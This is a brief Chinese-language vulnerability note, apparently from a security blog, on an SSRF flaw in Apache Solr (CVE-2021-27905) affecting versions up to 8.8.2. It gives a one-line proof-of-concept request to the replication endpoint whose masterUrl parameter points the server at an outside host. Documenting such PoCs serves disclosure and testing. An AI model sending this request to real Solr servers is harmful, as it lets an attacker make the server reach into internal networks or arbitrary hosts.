【初级】Apache Solr SSRF

CVE-2021-27905

漏洞描述:Apache solr是一个开源的搜索服务,使用java编写,运行在serblet容器的一个独立的全文搜索服务器,是apache luncene项目的开源企业搜索平台。

影响版本:Apache solr <=8.8.2

参考资料:

POC:

http://127.0.0.1:8983/solr/db/replication\?command=fetchindex\&masterUrl=http://xxxx:9999

© 版权声明
THE END
喜欢就支持一下吧
点赞6 分享